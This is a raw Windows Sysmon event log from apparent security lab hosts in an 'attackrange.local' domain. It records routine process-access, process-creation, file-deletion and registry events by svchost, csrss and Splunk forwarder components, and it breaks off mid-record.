16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245218Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245217Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245216Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245215Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245214Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245213Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245212Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245211Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245210Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-512C-6063-9C22-00000000AF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245209Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-512C-6063-9C22-00000000AF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245208Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.969{CB4067E1-512C-6063-9C22-00000000AF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245207Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B33B8162166B9225F62231C0B917D073,SHA256=20E6A1D46103A7CABC9842C7CF2DE756544F5054B219264D8D79CC12CA4E4D7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060652Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:21.921{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=070B4F6C9C61A2A21D68404C816AD0CE,SHA256=F44457BF312E16EEB74AC543242CEC09D81BF67B44D9BF2BE69FA06147A36369,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001060651Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:26:21.343{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72581-0x6b63e98a) 23542300x8000000000000000245235Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.922{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5CC0900CE76004BE7190AA349DE1FFC,SHA256=FC65CBC142D7C4FCF9ED01F45278C9B7B2112A6F0F7DB13122B7008793524330,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245234Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-512D-6063-9D22-00000000AF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245233Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245232Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245231Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245230Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245229Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245228Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245227Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245226Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245225Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245224Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-512D-6063-9D22-00000000AF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245223Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.640{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-512D-6063-9D22-00000000AF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245222Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.641{CB4067E1-512D-6063-9D22-00000000AF01}3584C:\Program 